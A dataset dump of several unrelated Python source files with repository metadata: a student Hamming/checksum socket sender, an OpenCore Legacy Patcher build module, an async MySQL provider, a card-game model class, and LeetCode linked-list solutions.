| no_license | https://github.com/Est17256/LAB2-Redes-Deteccion-Errores | 299f08fdbe737a49bd715ae0131ceafde61dffdc | 31e482ae6c2dcb6e2d45b3a02d586cf85e00891e | refs/heads/master | 2022-11-26T05:42:29.646040 | 2020-08-06T21:08:27 | 2020-08-06T21:08:27 | 284,817,363 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | ### Emisor del mensaje
import re
import socket
import pickle
### Funciones utilizadas para la implementacion de Hamming
def VerRdn(m):
for i in range(m):
if(2**i >= m + i + 1):
return i
def PosRdn(data, r):
j = 0
k = 1
m = len(data)
res = ''
for i in range(1, m + r+1):
if(i == 2**j):
res = res + '0'
j += 1
else:
res = res + data[-1 * k]
k += 1
return res[::-1]
def VerPrd(dat, r):
n = len(dat)
for i in range(r):
val = 0
for j in range(1, n + 1):
if(j & (2**i) == (2**i)):
val = val ^ int(dat[-1 * j])
dat = dat[:n-(2**i)] + str(val) + dat[n-(2**i)+1:]
return dat
def VerFnl(dat, nr):
n = len(dat)
res = 0
for i in range(nr):
val = 0
for j in range(1, n + 1):
if(j & (2**i) == (2**i)):
val = val ^ int(dat[-1 * j])
res = res + val*(10**i)
return int(str(res), 2)
### Funciones utilizadas para la implementacion de checksum
def sumarSegmentos(segmento1, segmento2):
carrier = '0'
suma = ''
for item in range(7,-1,-1):
a = int(segmento1[item])
b = int(segmento2[item])
resultadoAB = a + b + int(carrier)
if resultadoAB == 0:
suma = '0' + suma
carrier = '0'
elif resultadoAB == 1:
suma = '1' + suma
carrier = '0'
elif resultadoAB == 2:
suma = '0' + suma
carrier = '1'
elif resultadoAB == 3:
suma = '1' + suma
carrier = '1'
if carrier != '0':
suma = carrier + suma
return suma
def emisionCheckSum(binario):
n = 8
arrayBinary = [binario[i:i+n] for i in range(0, len(binario), n)]
sumaSegmentos = '00000000'
for i in arrayBinary:
sumaSegmentos = sumarSegmentos(sumaSegmentos, i)
if len(sumaSegmentos) > 8:
sumaSegmentos = sumaSegmentos[1:]
sumaSegmentos = sumarSegmentos(sumaSegmentos, '00000001')
return xor(sumaSegmentos)
def xor(segmento):
resultado = ''
for i in segmento:
if i == '0':
resultado = resultado + '1'
else:
resultado = resultado + '0'
return resultado
### Conexion por Socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1',9000))
sock.listen(1)
conexion, direccion = sock.accept()
print("Conexion relaizada con exito de la direccion", str(direccion))
### Procesamiento de capas del mensaje a enviar
Mensaje=input("Ingrese el mensaje: ")
mensajeEnviar = ''
### Convertir mensaje de STR -> BIN
Binario=' '.join(map(bin,bytearray(Mensaje,'utf8')))
Binario=Binario.replace("b","")
Binario=Binario.replace(" ","")
print("Mensaje en binario:", Binario)
binarioDeteccion = Binario
opcionita=int(input("Cual algoritmo desea probar, 1.Hamming 2.Checksum (Seleccion un numero): "))
if opcionita == 1:
m = len(Binario)
r = VerRdn(m)
dat = PosRdn(Binario, r)
dat = VerPrd(dat, r)
print(dat)
print(dat)
### Se ingresa el ruido al mensaje
ruido=int(input("Desea agregar ruido al mensaje, 1.Si 2.No (Seleccion un numero): "))
if ruido==1:
Lista=list(dat)
lista2=[]
print(Lista)
intervalo=int(input("Ingrese el intervalo del ruido: "))
intervalo2=0
for i in range(len(dat)):
intervalo2+=1
if intervalo2==intervalo:
lista2.append("1")
intervalo2=0
else:
lista2.append(Lista[i])
objeto=""
objeto=objeto.join(lista2)
print("Ruido")
print(objeto)
print("Ruido")
dat = objeto
### Utilizamos pickle para hacer provecho del uso del paquete bitarray
dat = '0' + dat + ',' + str(r)
mensajeEnviar = pickle.dumps(dat)
else:
dat = Binario
### Se ingresa el ruido al mensaje
ruido=int(input("Desea agregar ruido al mensaje, 1.Si 2.No (Seleccion un numero): "))
if ruido==1:
Lista=list(Binario)
lista2=[]
print(Lista)
intervalo=int(input("Ingrese el intervalo del ruido: "))
intervalo2=0
for i in range(len(Binario)):
intervalo2+=1
if intervalo2==intervalo:
lista2.append("1")
intervalo2=0
else:
lista2.append(Lista[i])
objeto=""
objeto=objeto.join(lista2)
print("Ruido")
print(objeto)
print("Ruido")
dat = objeto
complemento = emisionCheckSum(dat)
mensaje = '1' + Binario + complemento
### Utilizamos pickle para hacer provecho del uso del paquete bitarray
mensajeEnviar = pickle.dumps(mensaje)
### Se envia el objeto mensaje
conexion.send(mensajeEnviar)
conexion.close()
| UTF-8 | Python | false | false | 4,945 | py | 4 | emisor.py | 3 | 0.542164 | 0.517492 | 0 | 181 | 26.320442 | 97 |
dortania/Opencore-Legacy-Patcher | 15,607,911,165,855 | dd39415c7c57ca212c8a644e3939c8c6423c8ee6 | 7d13c03810d893447ca5b2b59c3cf46d835abad0 | /resources/build/build.py | 07615dafd78e3ee90b14b48d4e8c6a87628dc8c2 | []
| no_license | https://github.com/dortania/Opencore-Legacy-Patcher | fdcd3dfec0ce59e9cd8f5a0a1108c9d264b28843 | 961c9c7a683ea9860b704523cc04d65dc4fa440c | refs/heads/main | 2023-03-20T03:22:15.819393 | 2023-03-19T17:35:14 | 2023-03-19T17:35:14 | 315,490,189 | 64 | 15 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Class for generating OpenCore Configurations tailored for Macs
# Copyright (C) 2020-2022, Dhinak G, Mykola Grymalyuk
import copy
import pickle
import plistlib
import shutil
import zipfile
from pathlib import Path
from datetime import date
import logging
from resources import constants, utilities
from resources.build import bluetooth, firmware, graphics_audio, support, storage, smbios, security, misc
from resources.build.networking import wired, wireless
def rmtree_handler(func, path, exc_info):
if exc_info[0] == FileNotFoundError:
return
raise # pylint: disable=misplaced-bare-raise
class build_opencore:
def __init__(self, model, versions):
self.model = model
self.config = None
self.constants: constants.Constants = versions
def build_efi(self):
utilities.cls()
if not self.constants.custom_model:
logging.info(f"Building Configuration on model: {self.model}")
else:
logging.info(f"Building Configuration for external model: {self.model}")
self.generate_base()
self.set_revision()
# Set Lilu and co.
support.build_support(self.model, self.constants, self.config).enable_kext("Lilu.kext", self.constants.lilu_version, self.constants.lilu_path)
self.config["Kernel"]["Quirks"]["DisableLinkeditJettison"] = True
# Call support functions
firmware.build_firmware(self.model, self.constants, self.config).build()
wired.build_wired(self.model, self.constants, self.config).build()
wireless.build_wireless(self.model, self.constants, self.config).build()
graphics_audio.build_graphics_audio(self.model, self.constants, self.config).build()
bluetooth.build_bluetooth(self.model, self.constants, self.config).build()
storage.build_storage(self.model, self.constants, self.config).build()
smbios.build_smbios(self.model, self.constants, self.config).build()
security.build_security(self.model, self.constants, self.config).build()
misc.build_misc(self.model, self.constants, self.config).build()
# Work-around ocvalidate
if self.constants.validate is False:
logging.info("- Adding bootmgfw.efi BlessOverride")
self.config["Misc"]["BlessOverride"] += ["\\EFI\\Microsoft\\Boot\\bootmgfw.efi"]
def generate_base(self):
# Generate OpenCore base folder and config
if not Path(self.constants.build_path).exists():
logging.info("Creating build folder")
Path(self.constants.build_path).mkdir()
else:
logging.info("Build folder already present, skipping")
if Path(self.constants.opencore_zip_copied).exists():
logging.info("Deleting old copy of OpenCore zip")
Path(self.constants.opencore_zip_copied).unlink()
if Path(self.constants.opencore_release_folder).exists():
logging.info("Deleting old copy of OpenCore folder")
shutil.rmtree(self.constants.opencore_release_folder, onerror=rmtree_handler, ignore_errors=True)
logging.info("")
logging.info(f"- Adding OpenCore v{self.constants.opencore_version} {self.constants.opencore_build}")
shutil.copy(self.constants.opencore_zip_source, self.constants.build_path)
zipfile.ZipFile(self.constants.opencore_zip_copied).extractall(self.constants.build_path)
# Setup config.plist for editing
logging.info("- Adding config.plist for OpenCore")
shutil.copy(self.constants.plist_template, self.constants.oc_folder)
self.config = plistlib.load(Path(self.constants.plist_path).open("rb"))
def set_revision(self):
# Set revision in config
self.config["#Revision"]["Build-Version"] = f"{self.constants.patcher_version} - {date.today()}"
if not self.constants.custom_model:
self.config["#Revision"]["Build-Type"] = "OpenCore Built on Target Machine"
computer_copy = copy.copy(self.constants.computer)
computer_copy.ioregistry = None
self.config["#Revision"]["Hardware-Probe"] = pickle.dumps(computer_copy)
else:
self.config["#Revision"]["Build-Type"] = "OpenCore Built for External Machine"
self.config["#Revision"]["OpenCore-Version"] = f"{self.constants.opencore_version} - {self.constants.opencore_build} - {self.constants.opencore_commit}"
self.config["#Revision"]["Original-Model"] = self.model
self.config["NVRAM"]["Add"]["4D1FDA02-38C7-4A6A-9CC6-4BCCA8B30102"]["OCLP-Version"] = f"{self.constants.patcher_version}"
self.config["NVRAM"]["Add"]["4D1FDA02-38C7-4A6A-9CC6-4BCCA8B30102"]["OCLP-Model"] = self.model
def save_config(self):
plistlib.dump(self.config, Path(self.constants.plist_path).open("wb"), sort_keys=True)
def build_opencore(self):
# Generate OpenCore Configuration
self.build_efi()
if self.constants.allow_oc_everywhere is False or self.constants.allow_native_spoofs is True or (self.constants.custom_serial_number != "" and self.constants.custom_board_serial_number != ""):
smbios.build_smbios(self.model, self.constants, self.config).set_smbios()
support.build_support(self.model, self.constants, self.config).cleanup()
self.save_config()
# Post-build handling
support.build_support(self.model, self.constants, self.config).sign_files()
support.build_support(self.model, self.constants, self.config).validate_pathing()
logging.info("")
logging.info(f"Your OpenCore EFI for {self.model} has been built at:")
logging.info(f" {self.constants.opencore_release_folder}")
logging.info("")
if self.constants.gui_mode is False:
input("Press [Enter] to continue\n")
| UTF-8 | Python | false | false | 5,856 | py | 16 | build.py | 12 | 0.677083 | 0.669399 | 0 | 125 | 45.848 | 200 |
webclinic017/asyncdb | 13,443,247,637,179 | 6afb4dcff5918cb756481051c96d8b99d3a3cece | f50598c605d8299c8093a8c4eba6006c7616912d | /asyncdb/providers/mysql.py | c008acfa4cf5ddbc4e2c473f359e1909de590dd0 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
]
| permissive | https://github.com/webclinic017/asyncdb | 5e87bd8bce6780fdcfa6ef9dfc9129b299a49425 | 2fe94c719c88397d42b38cd8e2954be8eec3eee9 | refs/heads/master | 2023-08-31T09:17:32.841163 | 2021-10-20T17:34:38 | 2021-10-20T17:34:38 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
import asyncio
import json
import time
from datetime import datetime
import aiomysql
from asyncdb.exceptions import (
ConnectionTimeout,
DataError,
EmptyStatement,
NoDataFound,
ProviderError,
StatementError,
TooManyConnections,
)
from asyncdb.providers import (
BasePool,
BaseProvider,
registerProvider,
)
from asyncdb.utils import (
EnumEncoder,
SafeDict,
)
class mysqlPool(BasePool):
_max_queries = 300
# _dsn = 'mysql://{user}:{password}@{host}:{port}/{database}'
loop = asyncio.get_event_loop()
def __init__(self, loop=None, params={}):
self._logger.debug("Ready")
super(mysqlPool, self).__init__(loop=loop, params=params)
def get_event_loop(self):
return self._loop
"""
__init async db initialization
"""
# Create a database connection pool
async def connect(self):
self._logger.debug("aioMysql: Connecting to {}".format(self._params))
self._logger.debug("Start connection")
try:
# TODO: pass a setup class for set_builtin_type_codec and a setup for add listener
self._pool = await aiomysql.create_pool(
host=self._params["host"],
user=self._params["user"],
password=self._params["password"],
db=self._params["database"],
loop=self._loop,
)
except TimeoutError as err:
raise ConnectionTimeout(
"Unable to connect to database: {}".format(str(err))
)
except ConnectionRefusedError as err:
raise ProviderError(
"Unable to connect to database, connection Refused: {}".format(str(err))
)
except Exception as err:
raise ProviderError("Unknown Error: {}".format(str(err)))
return False
# is connected
if self._pool:
self._connected = True
self._initialized_on = time.time()
"""
Take a connection from the pool.
"""
async def acquire(self):
self._logger.debug("Acquire")
db = None
self._connection = None
# Take a connection from the pool.
try:
self._connection = await self._pool.acquire()
except Exception as err:
raise ProviderError("Close Error: {}".format(str(err)))
if self._connection:
db = mysql(pool=self)
db.set_connection(self._connection)
return db
"""
Release a connection from the pool
"""
async def release(self, connection=None, timeout=10):
self._logger.debug("Release")
if not connection:
conn = self._connection
else:
conn = connection
try:
await self._pool.release(conn)
# print('r', r)
# release = asyncio.create_task(r)
# await self._pool.release(connection, timeout = timeout)
# release = asyncio.ensure_future(release, loop=self._loop)
# await asyncio.wait_for(release, timeout=timeout, loop=self._loop)
# await release
except Exception as err:
raise ProviderError("Release Error: {}".format(str(err)))
"""
close
Close Pool Connection
"""
async def wait_close(self, gracefully=True):
if self._pool:
self._logger.debug("aioMysql: Closing Pool")
# try to closing main connection
try:
if self._connection:
await self._pool.release(self._connection, timeout=2)
except Exception as err:
raise ProviderError("Release Error: {}".format(str(err)))
# at now, try to closing pool
try:
await self._pool.close()
# await self._pool.terminate()
except Exception as err:
print("Pool Error: {}".format(str(err)))
await self._pool.terminate()
raise ProviderError("Pool Error: {}".format(str(err)))
finally:
self._pool = None
"""
Close Pool
"""
async def close(self):
# try:
# if self._connection:
# print('self._pool', self._pool)
# await self._pool.release(self._connection)
# except Exception as err:
# raise ProviderError("Release Error: {}".format(str(err)))
try:
await self._pool.close()
except Exception as err:
print("Pool Closing Error: {}".format(str(err)))
self._pool.terminate()
def terminate(self, gracefully=True):
self._loop.run_until_complete(asyncio.wait_for(self.close(), timeout=5))
"""
Execute a connection into the Pool
"""
async def execute(self, sentence, *args):
if self._pool:
try:
result = await self._pool.execute(sentence, *args)
return result
except Exception as err:
raise ProviderError("Execute Error: {}".format(str(err)))
class mysql(BaseProvider):
_provider = "mysql"
_syntax = "sql"
_test_query = "SELECT 1"
_dsn = "mysql://{user}:{password}@{host}:{port}/{database}"
_loop = None
_pool = None
_connection = None
_connected = False
_prepared = None
_parameters = ()
_cursor = None
_transaction = None
_initialized_on = None
_query_raw = "SELECT {fields} FROM {table} {where_cond}"
def __init__(self, loop=None, pool=None, params={}):
super(mysql, self).__init__(loop=loop, params=params)
asyncio.set_event_loop(self._loop)
async def close(self):
"""
Closing a Connection
"""
try:
if self._connection:
if not self._connection.closed:
self._logger.debug("Closing Connection")
try:
if self._pool:
self._pool.close()
else:
self._connection.close()
except Exception as err:
self._pool.terminate()
self._connection = None
raise ProviderError(
"Connection Error, Terminated: {}".format(str(err))
)
except Exception as err:
raise ProviderError("Close Error: {}".format(str(err)))
finally:
self._connection = None
self._connected = False
def terminate(self):
self._loop.run_until_complete(self.close())
async def connection(self):
"""
Get a connection
"""
self._connection = None
self._connected = False
self._cursor = None
try:
if not self._pool:
self._pool = await aiomysql.create_pool(
host=self._params["host"],
user=self._params["user"],
password=self._params["password"],
db=self._params["database"],
loop=self._loop,
)
self._connection = await self._pool.acquire()
self._cursor = await self._connection.cursor()
if self._connection:
self._connected = True
self._initialized_on = time.time()
except Exception as err:
self._connection = None
self._cursor = None
raise ProviderError("connection Error, Terminated: {}".format(str(err)))
finally:
return self._connection
"""
Release a Connection
"""
async def release(self):
try:
if not await self._connection.closed:
if self._pool:
release = asyncio.create_task(
self._pool.release(self._connection, timeout=10)
)
asyncio.ensure_future(release, loop=self._loop)
return await release
else:
await self._connection.close(timeout=5)
except Exception as err:
raise ProviderError("Release Interface Error: {}".format(str(err)))
return False
finally:
self._connected = False
self._connection = None
def prepared_statement(self):
return self._prepared
@property
def connected(self):
if self._pool:
return not self._pool._closed
elif self._connection:
return not self._connection.closed
"""
Preparing a sentence
"""
async def prepare(self, sentence=""):
error = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
try:
if not self._connection:
await self.connection()
try:
stmt = await asyncio.shield(self._connection.prepare(sentence))
try:
# print(stmt.get_attributes())
self._columns = [a.name for a in stmt.get_attributes()]
self._prepared = stmt
self._parameters = stmt.get_parameters()
except TypeError:
self._columns = []
except RuntimeError as err:
error = "Prepare Runtime Error: {}".format(str(err))
raise StatementError(error)
except Exception as err:
error = "Unknown Error: {}".format(str(err))
raise ProviderError(error)
finally:
return [self._prepared, error]
async def query(self, sentence="", size=100000000000):
# self._logger.debug("Start Query function")
error = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
if not self._connection:
await self.connection()
try:
startTime = datetime.now()
await self._cursor.execute(sentence)
self._result = await self.fetchmany(size)
if not self._result:
raise NoDataFound("Mysql: No Data was Found")
return [None, "Mysql: No Data was Found"]
except RuntimeError as err:
error = "Runtime Error: {}".format(str(err))
raise ProviderError(error)
except Exception as err:
error = "Error on Query: {}".format(str(err))
raise Exception(error)
finally:
# self._generated = datetime.now() - startTime
# await self.close()
return [self._result, error]
async def queryrow(self, sentence=""):
error = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
if not self._connection:
await self.connection()
try:
# stmt = await self._connection.prepare(sentence)
# self._columns = [a.name for a in stmt.get_attributes()]
await self._cursor.execute(sentence)
self._result = await self.fetchone()
except RuntimeError as err:
error = "Runtime on Query Row Error: {}".format(str(err))
raise ProviderError(error)
except Exception as err:
error = "Error on Query Row: {}".format(str(err))
raise Exception(error)
# finally:
# await self.close()
return [self._result, error]
async def execute(self, sentence=""):
"""Execute a transaction
get a SQL sentence and execute
returns: results of the execution
"""
error = None
result = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
if not self._connection:
await self.connection()
try:
result = await self._cursor.execute(sentence)
return [result, None]
return [None, error]
except Exception as err:
error = "Error on Execute: {}".format(str(err))
raise [None, error]
finally:
return [result, error]
async def executemany(self, sentence="", args=[]):
error = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
if not self._connection:
await self.connection()
try:
await self.begin()
await self._cursor.executemany(sentence, args)
await self.commit()
return False
except Exception as err:
await self.rollback()
error = "Error on Execute: {}".format(str(err))
raise Exception(error)
finally:
return error
"""
Transaction Context
"""
async def begin(self):
if not self._connection:
await self.connection()
await self._connection.begin()
return self
async def commit(self):
if not self._connection:
await self.connection()
await self._connection.commit()
return self
async def rollback(self):
if not self._connection:
await self.connection()
await self._connection.rollback()
return self
"""
Cursor Context
"""
async def cursor(self, sentence=""):
self._logger.debug("Cursor")
if not self._connection:
await self.connection()
return self._cursor
async def forward(self, number):
try:
return await self._cursor.scroll(number)
except Exception as err:
error = "Error forward Cursor: {}".format(str(err))
raise Exception(error)
async def fetchall(self):
try:
return await self._cursor.fetchall()
except Exception as err:
error = "Error FetchAll Cursor: {}".format(str(err))
raise Exception(error)
async def fetchmany(self, size=None):
try:
return await self._cursor.fetchmany(size)
except Exception as err:
error = "Error FetchMany Cursor: {}".format(str(err))
raise Exception(error)
async def fetchone(self):
try:
return await self._cursor.fetchone()
except Exception as err:
error = "Error FetchOne Cursor: {}".format(str(err))
raise Exception(error)
"""
Cursor Iterator Context
"""
def __aiter__(self):
return self
async def __anext__(self):
data = await self._cursor.fetchrow()
if data is not None:
return data
else:
raise StopAsyncIteration
"""
COPY Functions
type: [ text, csv, binary ]
"""
async def copy_from_table(
self, table="", schema="public", output=None, type="csv", columns=None
):
"""table_copy
get a copy of table data into a file, file-like object or a coroutine passed on "output"
returns: num of rows copied.
example: COPY 1470
"""
if not self._connection:
await self.connection()
try:
result = await self._connection.copy_from_table(
table_name=table,
schema_name=schema,
columns=columns,
format=type,
output=output,
)
print(result)
return result
except Exception as err:
error = "Error on Table Copy: {}".format(str(err))
raise Exception(error)
async def copy_to_table(
self, table="", schema="public", source=None, type="csv", columns=None
):
"""copy_to_table
get data from a file, file-like object or a coroutine passed on "source" and copy into table
returns: num of rows copied.
example: COPY 1470
"""
if not self._connection:
await self.connection()
try:
result = await self._connection.copy_to_table(
table_name=table,
schema_name=schema,
columns=columns,
format=type,
source=source,
)
print(result)
return result
except Exception as err:
error = "Error on Table Copy: {}".format(str(err))
raise Exception(error)
async def copy_into_table(
self, table="", schema="public", source=None, columns=None
):
"""copy_into_table
get data from records (any iterable object) and save into table
returns: num of rows copied.
example: COPY 1470
"""
if not self._connection:
await self.connection()
try:
result = await self._connection.copy_records_to_table(
table_name=table, schema_name=schema, columns=columns, records=source
)
print(result)
return result
except Exception as err:
error = "Error on Table Copy: {}".format(str(err))
raise Exception(error)
"""
Meta-Operations
"""
def table(self, table):
try:
return self._query_raw.format_map(SafeDict(table=table))
except Exception as e:
print(e)
return False
def fields(self, sentence, fields=None):
_sql = False
if not fields:
_sql = sentence.format_map(SafeDict(fields="*"))
elif type(fields) == str:
_sql = sentence.format_map(SafeDict(fields=fields))
elif type(fields) == list:
_sql = sentence.format_map(SafeDict(fields=",".join(fields)))
return _sql
"""
where
add WHERE conditions to SQL
"""
def where(self, sentence, where):
sql = ""
if sentence:
where_string = ""
if not where:
sql = sentence.format_map(SafeDict(where_cond=""))
elif type(where) == dict:
where_cond = []
for key, value in where.items():
# print("KEY {}, VAL: {}".format(key, value))
if type(value) == str or type(value) == int:
if value == "null" or value == "NULL":
where_string.append("%s IS NULL" % (key))
elif value == "!null" or value == "!NULL":
where_string.append("%s IS NOT NULL" % (key))
elif key.endswith("!"):
where_cond.append("%s != %s" % (key[:-1], value))
else:
if (
type(value) == str
and value.startswith("'")
and value.endswith("'")
):
where_cond.append("%s = %s" % (key, "{}".format(value)))
elif type(value) == int:
where_cond.append("%s = %s" % (key, "{}".format(value)))
else:
where_cond.append(
"%s = %s" % (key, "'{}'".format(value))
)
elif type(value) == bool:
val = str(value)
where_cond.append("%s = %s" % (key, val))
else:
val = ",".join(map(str, value))
if type(val) == str and "'" not in val:
where_cond.append("%s IN (%s)" % (key, "'{}'".format(val)))
else:
where_cond.append("%s IN (%s)" % (key, val))
# if 'WHERE ' in sentence:
# where_string = ' AND %s' % (' AND '.join(where_cond))
# else:
where_string = " WHERE %s" % (" AND ".join(where_cond))
print("WHERE cond is %s" % where_string)
sql = sentence.format_map(SafeDict(where_cond=where_string))
elif type(where) == str:
where_string = where
if not where.startswith("WHERE"):
where_string = " WHERE %s" % where
sql = sentence.format_map(SafeDict(where_cond=where_string))
else:
sql = sentence.format_map(SafeDict(where_cond=""))
del where
del where_string
return sql
else:
return False
def limit(self, sentence, limit=1):
"""
LIMIT
add limiting to SQL
"""
if sentence:
return "{q} LIMIT {limit}".format(q=sentence, limit=limit)
return self
def orderby(self, sentence, ordering=[]):
"""
LIMIT
add limiting to SQL
"""
if sentence:
if type(ordering) == str:
return "{q} ORDER BY {ordering}".format(q=sentence, ordering=ordering)
elif type(ordering) == list:
return "{q} ORDER BY {ordering}".format(
q=sentence, ordering=", ".join(ordering)
)
return self
def get_query(self, sentence):
"""
get_query
Get formmated query
"""
sql = sentence
try:
# remove fields and where_cond
sql = sentence.format_map(SafeDict(fields="*", where_cond=""))
if not self.connected:
self._loop.run_until_complete(self.connection())
prepared, error = self._loop.run_until_complete(self.prepare(sql))
if not error:
self._columns = self.get_columns()
else:
print("Error in Get Query", error)
return False
except (ProviderError, StatementError) as err:
print("ProviderError or StatementError Exception in Get Query", e)
return False
except Exception as e:
print("Exception in Get Query", e)
return False
return sql
def column_info(self, table):
"""
column_info
get column information about a table
"""
discover = "SELECT attname AS column_name, atttypid::regtype AS data_type FROM pg_attribute WHERE attrelid = '{}'::regclass AND attnum > 0 AND NOT attisdropped ORDER BY attnum".format(
table
)
try:
result, error = self._loop.run_until_complete(self.query(discover))
if result:
return result
except (NoDataFound, ProviderError):
print(err)
return False
except Exception as err:
print(err)
return False
def insert(self, table, data, **kwargs):
"""
insert
insert the result onto a table
"""
sql = "INSERT INTO {table} ({fields}) VALUES ({values})"
sql = sql.format_map(SafeDict(table=table))
# set columns
sql = sql.format_map(SafeDict(fields=",".join(data.keys())))
values = ",".join(str(v) for v in data.values())
sql = sql.format_map(SafeDict(values=values))
try:
result = self._loop.run_until_complete(self._connection.execute(sql))
if not result:
print(result)
return False
else:
return result
except Exception as err:
# print(sql)
print(err)
return False
"""
Registering this Provider
"""
registerProvider(mysql)
| UTF-8 | Python | false | false | 23,819 | py | 77 | mysql.py | 61 | 0.513288 | 0.51165 | 0 | 722 | 31.990305 | 193 |
skrla/OOP_JAVA_PHP_PYTHON_SWIFT | 4,346,506,951,515 | 59a9f2bcfb761f6125af7c045b6fd8876cb2998c | 7dd0b989cb4915f9a04361da49f0c10775209c86 | /Python/model/Partija.py | bee25d69f4a22a311c7baf1f38921d379ce532bf | []
| no_license | https://github.com/skrla/OOP_JAVA_PHP_PYTHON_SWIFT | aa55771ccbb1406bcd2ac6b6699145403835cc75 | ecb79d79cf8c6e78f8e330f73a4d7a6f438a925a | refs/heads/master | 2023-03-29T05:57:05.824323 | 2021-03-28T12:20:03 | 2021-03-28T12:20:03 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from model.Entitet import Entitet
from model.Igrac import Igrac
from model.Lokacija import Lokacija
from model.Rezultat import Rezultat
class Partija(Entitet):
def __init__(self, sifra=None):
super().__init__(sifra)
self._do_koliko_se_igra = 501
self._lokacija = Lokacija()
self._unosi = Igrac()
self._mjesanja = []
self._igraci = []
def get_rezultat(self) -> Rezultat:
rezultat = Rezultat()
rezultat.prvi = sum(mjesanje.get_rezultat().prvi for mjesanje in self.mjesanja)
rezultat.drugi = sum(mjesanje.get_rezultat().drugi for mjesanje in self.mjesanja)
return rezultat
@property
def is_igra_gotova(self) -> bool:
rezultat = self.get_rezultat()
if rezultat.is_pocetak():
return False
if rezultat.treci == 0:
return False if rezultat.prvi == rezultat.drugi else rezultat.prvi > self.do_koliko_se_igra or \
rezultat.drugi > self.do_koliko_se_igra
else:
return rezultat.prvi > self.do_koliko_se_igra or rezultat.drugi > self.do_koliko_se_igra or \
rezultat.treci > self.do_koliko_se_igra
return False
@property
def do_koliko_se_igra(self):
return self._do_koliko_se_igra
@do_koliko_se_igra.setter
def do_koliko_se_igra(self, do_koliko_se_igra):
self._do_koliko_se_igra = do_koliko_se_igra
@property
def lokacija(self):
return self._lokacija
@lokacija.setter
def lokacija(self, lokacija):
self._lokacija = lokacija
@property
def unosi(self):
return self._unosi
@unosi.setter
def unosi(self, unosi):
self._unosi = unosi
@property
def mjesanja(self):
return self._mjesanja
@mjesanja.setter
def mjesanja(self, mjesanja):
self._mjesanja = mjesanja
@property
def igraci(self):
return self._igraci
@igraci.setter
def igraci(self, igraci):
self._igraci = igraci
| UTF-8 | Python | false | false | 2,082 | py | 88 | Partija.py | 67 | 0.599904 | 0.597983 | 0 | 74 | 27.135135 | 108 |
FujitaHirotaka/djangoruler3 | 17,471,926,973,275 | 0cf324e4784b2b933bec45adc7129823a054d5df | c1c7214e1f9230f19d74bb9776dac40d820da892 | /examples/css辞書/dropshadow/box-shadow/project/app/forms.py | 1bc8d7ad974bab511d23f93c0df35a2810c133de | []
| no_license | https://github.com/FujitaHirotaka/djangoruler3 | cb326c80d9413ebdeaa64802c5e5f5daadb00904 | 9a743fbc12a0efa73dbc90f93baddf7e8a4eb4f8 | refs/heads/master | 2020-04-01T13:32:28.078110 | 2018-12-13T00:39:56 | 2018-12-13T00:39:56 | 153,256,642 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django import forms
from .models import *
from django.urls import reverse
from django.urls import reverse_lazy
from pathlib import Path
bathpath=Path.cwd()/"app"/"static"/"app"/"images"
class CssForm(forms.Form):
value1=forms.IntegerField(label="第一パラメーター(水平方向の影のオフセット距離 px)", help_text="正負の値可")
value2=forms.IntegerField(label="第二パラメーター(垂直方向の影のオフセット距離 px)", help_text="正負の値可")
value3=forms.IntegerField(label="第三パラメーター(ぼかし距離)px", help_text="正の値のみ可")
value4=forms.IntegerField(label="第四パラメーター(広がり距離)px", help_text="正の値のみ可")
inset=forms.BooleanField(label="第五パラメーター(inset)", required=False) | UTF-8 | Python | false | false | 840 | py | 300 | forms.py | 136 | 0.753226 | 0.746774 | 0 | 14 | 43.071429 | 85 |
ivanAbregu/ci | 15,710,990,396,127 | 487d2767a1308b1f1cbd958c84ab804f6b6a03a9 | 3931c14aca58e2149a6440245e363807732a17fd | /test_sum.py | c4dbe8a85463e9df1aabb1a9a1cfaa49c34d5307 | []
| no_license | https://github.com/ivanAbregu/ci | 830ee297a5b469cdd2e05583ac3fe85ea34ee179 | 5d473b17a7a15223acbda50bf993254b40977aff | refs/heads/master | 2020-12-31T10:10:04.149824 | 2020-03-09T02:10:50 | 2020-03-09T02:10:50 | 238,993,606 | 0 | 0 | null | false | 2020-06-04T18:07:20 | 2020-02-07T18:08:56 | 2020-03-09T02:10:53 | 2020-03-09T02:13:35 | 18 | 0 | 0 | 1 | Python | false | false | import unittest
from sum import custom_sum
class MyTestCase(unittest.TestCase):
def test_custom_sum(self):
self.assertEqual(custom_sum(1, 1), 2)
def test_sum_big(self):
self.assertEqual(custom_sum(5000, 5000), 10000)
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 291 | py | 3 | test_sum.py | 2 | 0.652921 | 0.597938 | 0 | 12 | 23.25 | 55 |
mtianyan/LeetcodePython | 18,674,517,806,581 | c0487f6a371675ec41070859ac5475b0471ef670 | 7f57c1bc457f693d1e2b482bd92180b5f619d3bb | /easy/7-0706/160-intersection-of-two-linked-lists.py | 4322be9e165f9c752b96f7f5c1db0975101f5fbf | []
| no_license | https://github.com/mtianyan/LeetcodePython | 17694eed256886a075208264904ac1533df71d03 | 6880de6f92d8b6bf9223656f356831fb2b475202 | refs/heads/master | 2023-07-11T19:46:54.388781 | 2023-07-06T15:59:34 | 2023-07-06T15:59:34 | 331,367,286 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
A, B = headA, headB
while A != B:
A = A.next if A else headB
B = B.next if B else headA
return A
class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
s = set()
p, q = headA, headB
while p:
s.add(p)
p = p.next
while q:
if q in s:
return q
q = q.next
return None
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> Optional[ListNode]:
hash_set = set()
i, j = headA, headB
while i:
hash_set.add(i)
